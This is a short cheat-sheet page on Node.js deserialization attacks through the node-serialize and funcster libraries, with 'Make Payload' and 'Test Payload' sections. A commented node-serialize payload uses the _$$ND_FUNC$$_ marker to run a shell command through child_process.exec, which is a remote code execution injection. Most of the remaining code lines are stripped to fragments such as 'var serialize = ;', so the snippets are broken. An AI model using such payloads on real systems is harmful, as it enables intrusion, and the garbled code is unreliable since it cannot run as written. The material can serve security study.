Link to this headingNode JS Deseralization
Link to this headingUsing node-serialize library
Make Payload:
var y =
var serialize = ;
var payload_serialized = serialize.;
;
//{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
Test Payload:
var serialize = ;
var test = ;
serialize.;
Link to this headingUsing funcster Library
Make Payload:
funcster = ;
//Serialization
var test = funcster.
// { __js_function: 'function(){return"Hello world!"}' }
Test Payload:
//Deserialization with auto-execution
var desertest1 =
funcster.
var desertest2 =
funcster.
var desertest3 =
funcster.